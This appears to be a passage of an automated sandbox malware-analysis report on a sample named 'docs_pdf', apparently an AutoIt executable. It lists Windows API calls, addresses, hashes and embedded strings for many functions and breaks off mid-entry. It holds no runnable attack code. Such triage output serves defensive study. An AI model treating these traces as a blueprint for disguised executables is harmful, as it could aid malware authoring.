                                    • Instruction ID: 401585b9e9bbc86ed50c05975a750dd15362b789ca7691d352eaafde14fcf6ac
                                    • Opcode Fuzzy Hash: 5045647211aa7cb0a836a4f67bdb2543e30bb319f29f94bc7dc58c3fe3fb3fb8
                                    • Instruction Fuzzy Hash: ADB16B71608341AFDB54DF29C848B5ABBE8BF88710F00895CF6D9DB2A1D775E805CB92
                                    APIs
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FB28BC
                                    • GetSystemMetrics.USER32(00000007), ref: 00FB28C4
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FB28EF
                                    • GetSystemMetrics.USER32(00000008), ref: 00FB28F7
                                    • GetSystemMetrics.USER32(00000004), ref: 00FB291C
                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FB2939
                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FB2949
                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FB297C
                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FB2990
                                    • GetClientRect.USER32(00000000,000000FF), ref: 00FB29AE
                                    • GetStockObject.GDI32(00000011), ref: 00FB29CA
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB29D5
                                      • Part of subcall function 00FB2344: GetCursorPos.USER32(?), ref: 00FB2357
                                      • Part of subcall function 00FB2344: ScreenToClient.USER32(010767B0,?), ref: 00FB2374
                                      • Part of subcall function 00FB2344: GetAsyncKeyState.USER32(00000001), ref: 00FB2399
                                      • Part of subcall function 00FB2344: GetAsyncKeyState.USER32(00000002), ref: 00FB23A7
                                    • SetTimer.USER32(00000000,00000000,00000028,00FB1256), ref: 00FB29FC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                    • String ID: AutoIt v3 GUI
                                    • API String ID: 1458621304-248962490
                                    • Opcode ID: b9c79da141e16552adb860468f8c434b77849c6f67b583df90a39afce946da85
                                    • Instruction ID: 4f4ee8789afa3a4f0291bb9089f83c33878775e242d89624892e5a68408f46e2
                                    • Opcode Fuzzy Hash: b9c79da141e16552adb860468f8c434b77849c6f67b583df90a39afce946da85
                                    • Instruction Fuzzy Hash: 88B18E71A0020AEFDB24DFA9D845BED7BB8FB08310F108219FA56E6294DB39D801DF51
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 010340F6
                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 010341B6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                    • API String ID: 3974292440-719923060
                                    • Opcode ID: ea2006963c7824a5d10b135ae09a56634691049a23b4bfd3b35acb737a884c85
                                    • Instruction ID: 31f8d291c6194a0a3cb172baafc30fa22c443c991bf3f528542917bfc04b5497
                                    • Opcode Fuzzy Hash: ea2006963c7824a5d10b135ae09a56634691049a23b4bfd3b35acb737a884c85
                                    • Instruction Fuzzy Hash: 3FA18D702143029BDB14EF25CD51AAAB7EABF84314F048959B9D6AB3D2DF78EC05CB41
                                    APIs
                                    • LoadCursorW.USER32(00000000,00007F89), ref: 01025309
                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 01025314
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0102531F
                                    • LoadCursorW.USER32(00000000,00007F03), ref: 0102532A
                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 01025335
                                    • LoadCursorW.USER32(00000000,00007F01), ref: 01025340
                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0102534B
                                    • LoadCursorW.USER32(00000000,00007F88), ref: 01025356
                                    • LoadCursorW.USER32(00000000,00007F80), ref: 01025361
                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0102536C
                                    • LoadCursorW.USER32(00000000,00007F83), ref: 01025377
                                    • LoadCursorW.USER32(00000000,00007F85), ref: 01025382
                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0102538D
                                    • LoadCursorW.USER32(00000000,00007F84), ref: 01025398
                                    • LoadCursorW.USER32(00000000,00007F04), ref: 010253A3
                                    • LoadCursorW.USER32(00000000,00007F02), ref: 010253AE
                                    • GetCursorInfo.USER32(?), ref: 010253BE
                                    • GetLastError.KERNEL32(00000001,00000000), ref: 010253E9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Cursor$Load$ErrorInfoLast
                                    • String ID:
                                    • API String ID: 3215588206-0
                                    • Opcode ID: 6f49e1bd2bdbb5d8044ca31ebe2367e89926518b599f6ab6188d7e7cd9b49629
                                    • Instruction ID: ed6bb56efad50a55d473f480456a7ca8d0bf751b93d6a15e8e6c2fc1d64328cd
                                    • Opcode Fuzzy Hash: 6f49e1bd2bdbb5d8044ca31ebe2367e89926518b599f6ab6188d7e7cd9b49629
                                    • Instruction Fuzzy Hash: D4415370E083296ADB109FBA8C499AEFFF8EF51B10F10452FE549E7290DAB89501CE55
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000100), ref: 0100AAA5
                                    • __swprintf.LIBCMT ref: 0100AB46
                                    • _wcscmp.LIBCMT ref: 0100AB59
                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0100ABAE
                                    • _wcscmp.LIBCMT ref: 0100ABEA
                                    • GetClassNameW.USER32(?,?,00000400), ref: 0100AC21
                                    • GetDlgCtrlID.USER32(?), ref: 0100AC73
                                    • GetWindowRect.USER32(?,?), ref: 0100ACA9
                                    • GetParent.USER32(?), ref: 0100ACC7
                                    • ScreenToClient.USER32(00000000), ref: 0100ACCE
                                    • GetClassNameW.USER32(?,?,00000100), ref: 0100AD48
                                    • _wcscmp.LIBCMT ref: 0100AD5C
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0100AD82
                                    • _wcscmp.LIBCMT ref: 0100AD96
                                      • Part of subcall function 00FD386C: _iswctype.LIBCMT ref: 00FD3874
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                    • String ID: %s%u
                                    • API String ID: 3744389584-679674701
                                    • Opcode ID: ce87e9ca0fe18816b0e2cc14efdc8d325a81431d7ba5cc2054b32826ef6a56b7
                                    • Instruction ID: aa93e3988ca04f692f8c6952dd4e30afcd1e20222df1fd71e33623659807297f
                                    • Opcode Fuzzy Hash: ce87e9ca0fe18816b0e2cc14efdc8d325a81431d7ba5cc2054b32826ef6a56b7
                                    • Instruction Fuzzy Hash: CDA1CF71204706EFE716EE28C884FAABBE8FF04315F04462AFADA83191D734E545CB91
                                    APIs
                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0100B3DB
                                    • _wcscmp.LIBCMT ref: 0100B3EC
                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0100B414
                                    • CharUpperBuffW.USER32(?,00000000), ref: 0100B431
                                    • _wcscmp.LIBCMT ref: 0100B44F
                                    • _wcsstr.LIBCMT ref: 0100B460
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0100B498
                                    • _wcscmp.LIBCMT ref: 0100B4A8
                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0100B4CF
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0100B518
                                    • _wcscmp.LIBCMT ref: 0100B528
                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0100B550
                                    • GetWindowRect.USER32(00000004,?), ref: 0100B5B9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                    • String ID: @$ThumbnailClass
                                    • API String ID: 1788623398-1539354611
                                    • Opcode ID: 06229acb54c0dba870ada83105ca880baac8c5c93860db5a2f350fef5a623d42
                                    • Instruction ID: 8317e953d5fbe43207a1b7c069b5e71f19603cc389db36308d51373621602536
                                    • Opcode Fuzzy Hash: 06229acb54c0dba870ada83105ca880baac8c5c93860db5a2f350fef5a623d42
                                    • Instruction Fuzzy Hash: A381C4710043069BEB12DF14C885FAA7BD8FF44714F0885AAFDC59A1D2DB38DA45CB61
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                    • API String ID: 1038674560-1810252412
                                    • Opcode ID: 2b09deaa6a66a5eaa545158c0a1480be2fb8c21b62cb2d7d93ebee178dd33475
                                    • Instruction ID: 7b42e423303b8ef6a6e79a55ca2665fbd4131eeb0e43449e54a30958829bcc50
                                    • Opcode Fuzzy Hash: 2b09deaa6a66a5eaa545158c0a1480be2fb8c21b62cb2d7d93ebee178dd33475
                                    • Instruction Fuzzy Hash: 7D31C138A04306AAEB11FA62CD43EEE77ADAF14B50F60002AF4C1764D2EF796E04D951
                                    APIs
                                    • LoadIconW.USER32(00000063), ref: 0100C4D4
                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0100C4E6
                                    • SetWindowTextW.USER32(?,?), ref: 0100C4FD
                                    • GetDlgItem.USER32(?,000003EA), ref: 0100C512
                                    • SetWindowTextW.USER32(00000000,?), ref: 0100C518
                                    • GetDlgItem.USER32(?,000003E9), ref: 0100C528
                                    • SetWindowTextW.USER32(00000000,?), ref: 0100C52E
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0100C54F
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0100C569
                                    • GetWindowRect.USER32(?,?), ref: 0100C572
                                    • SetWindowTextW.USER32(?,?), ref: 0100C5DD
                                    • GetDesktopWindow.USER32 ref: 0100C5E3
                                    • GetWindowRect.USER32(00000000), ref: 0100C5EA
                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0100C636
                                    • GetClientRect.USER32(?,?), ref: 0100C643
                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0100C668
                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0100C693
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                    • String ID:
                                    • API String ID: 3869813825-0
                                    • Opcode ID: 8115812785f4812e74742cee5611d7c3720b92e031ea0698528c543f1ea1abdb
                                    • Instruction ID: cf4e72c7aec5880cf7425ca018b44aa07a7978b58ebfb616db9dee05f0919d34
                                    • Opcode Fuzzy Hash: 8115812785f4812e74742cee5611d7c3720b92e031ea0698528c543f1ea1abdb
                                    • Instruction Fuzzy Hash: C651617090070AAFEB219FA8DE85B6FBBF9FF04705F004658E682A25A0C775A944DB50
                                    APIs
                                    • _memset.LIBCMT ref: 0103A4C8
                                    • DestroyWindow.USER32(?,?), ref: 0103A542
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0103A5BC
                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0103A5DE
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0103A5F1
                                    • DestroyWindow.USER32(00000000), ref: 0103A613
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FB0000,00000000), ref: 0103A64A
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0103A663
                                    • GetDesktopWindow.USER32 ref: 0103A67C
                                    • GetWindowRect.USER32(00000000), ref: 0103A683
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0103A69B
                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0103A6B3
                                      • Part of subcall function 00FB25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FB25EC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                    • String ID: 0$tooltips_class32
                                    • API String ID: 1297703922-3619404913
                                    • Opcode ID: e573173c0f8f7bf17ef8671d4a79fdf4f96f3f2ea4448288a1acaaf9ac5831e0
                                    • Instruction ID: b8869a17a84b1a9e796a0f536921736000b9262e72446d77f0de9f64a4529f2f
                                    • Opcode Fuzzy Hash: e573173c0f8f7bf17ef8671d4a79fdf4f96f3f2ea4448288a1acaaf9ac5831e0
                                    • Instruction Fuzzy Hash: 64717970640205AFE721DF28C849F6A7BE9FBC8300F04451DFAC6D72A1D776A906DB21
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • DragQueryPoint.SHELL32(?,?), ref: 0103C917
                                      • Part of subcall function 0103ADF1: ClientToScreen.USER32(?,?), ref: 0103AE1A
                                      • Part of subcall function 0103ADF1: GetWindowRect.USER32(?,?), ref: 0103AE90
                                      • Part of subcall function 0103ADF1: PtInRect.USER32(?,?,0103C304), ref: 0103AEA0
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0103C980
                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0103C98B
                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0103C9AE
                                    • _wcscat.LIBCMT ref: 0103C9DE
                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0103C9F5
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0103CA0E
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0103CA25
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0103CA47
                                    • DragFinish.SHELL32(?), ref: 0103CA4E
                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0103CB41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                    • API String ID: 169749273-3440237614
                                    • Opcode ID: 62515059db602f99d9a36fa71c0248522aa88de660c07966a07c221791c9a80f
                                    • Instruction ID: 91e78eef232b860d5de37df6298f918dfeb686692bdae5010bb65de7ecacf608
                                    • Opcode Fuzzy Hash: 62515059db602f99d9a36fa71c0248522aa88de660c07966a07c221791c9a80f
                                    • Instruction Fuzzy Hash: CB618871508301AFD710EF61CC89D9BBBECEFC8750F000A1EF692A61A1DB759A09DB52
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 010346AB
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 010346F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                    • API String ID: 3974292440-4258414348
                                    • Opcode ID: f119cb9a643af829eb026cfe0a9cbef64bb63abff67944ef82f6cadf3682832d
                                    • Instruction ID: d72ea74ff5d32a51a20a14ab84355c373f87af64469dd9ca29e8a09fe769ce2e
                                    • Opcode Fuzzy Hash: f119cb9a643af829eb026cfe0a9cbef64bb63abff67944ef82f6cadf3682832d
                                    • Instruction Fuzzy Hash: 079160742043029BCB14EF25C850AADBBEABF94314F04445DA9D69B3A2CB79ED4ADB41
                                    APIs
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    • CharLowerBuffW.USER32(?,?), ref: 0101A636
                                    • GetDriveTypeW.KERNEL32 ref: 0101A683
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0101A6CB
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0101A702
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0101A730
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                    • API String ID: 2698844021-4113822522
                                    • Opcode ID: df0e9b5adca9ccf98fa1a57cd2b631e0d6f2db688c73e5865d0aafd161801320
                                    • Instruction ID: b457e837a13abfaca094a4dde0360180f28745e4945a01947ca62f07caacc1ef
                                    • Opcode Fuzzy Hash: df0e9b5adca9ccf98fa1a57cd2b631e0d6f2db688c73e5865d0aafd161801320
                                    • Instruction Fuzzy Hash: D45138712043059FC700EF25CC819AAB7E9FF88718F00495DF896A7261DB39AE0ADF52
                                    APIs
                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0101A47A
                                    • __swprintf.LIBCMT ref: 0101A49C
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0101A4D9
                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0101A4FE
                                    • _memset.LIBCMT ref: 0101A51D
                                    • _wcsncpy.LIBCMT ref: 0101A559
                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0101A58E
                                    • CloseHandle.KERNEL32(00000000), ref: 0101A599
                                    • RemoveDirectoryW.KERNEL32(?), ref: 0101A5A2
                                    • CloseHandle.KERNEL32(00000000), ref: 0101A5AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                    • String ID: :$\$\??\%s
                                    • API String ID: 2733774712-3457252023
                                    • Opcode ID: d9687fe024cc975201c4613714dfca2b58d897f1585ce85d7e1ce1d3f741a319
                                    • Instruction ID: 3ac25c2cd4bcd68da8e6f0e85e9c5bebf38d0ed776097e7251598b6c49b58e9d
                                    • Opcode Fuzzy Hash: d9687fe024cc975201c4613714dfca2b58d897f1585ce85d7e1ce1d3f741a319
                                    • Instruction Fuzzy Hash: 3331D271A0014AABDB219FA4DC48FEB77BDEF88301F1041B6FA48D3154EB7892448B25
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                    • String ID:
                                    • API String ID: 884005220-0
                                    • Opcode ID: 6335cedb1ba8d9df5208ccad8311a5bbb1e6f94acf9160292652472418759e45
                                    • Instruction ID: 2cc83933b99537493739d8aabd9f24b100bb948a845c4f97703f9d6cd4bd96bf
                                    • Opcode Fuzzy Hash: 6335cedb1ba8d9df5208ccad8311a5bbb1e6f94acf9160292652472418759e45
                                    • Instruction Fuzzy Hash: 38610472E00245EFDB206F26EC02B6977AAEF51731F244166E801DB284DB3DE841E792
                                    APIs
                                    • __wsplitpath.LIBCMT ref: 0101DC7B
                                    • _wcscat.LIBCMT ref: 0101DC93
                                    • _wcscat.LIBCMT ref: 0101DCA5
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0101DCBA
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0101DCCE
                                    • GetFileAttributesW.KERNEL32(?), ref: 0101DCE6
                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0101DD00
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0101DD12
                                    Strings
                                    Memory Dump Source
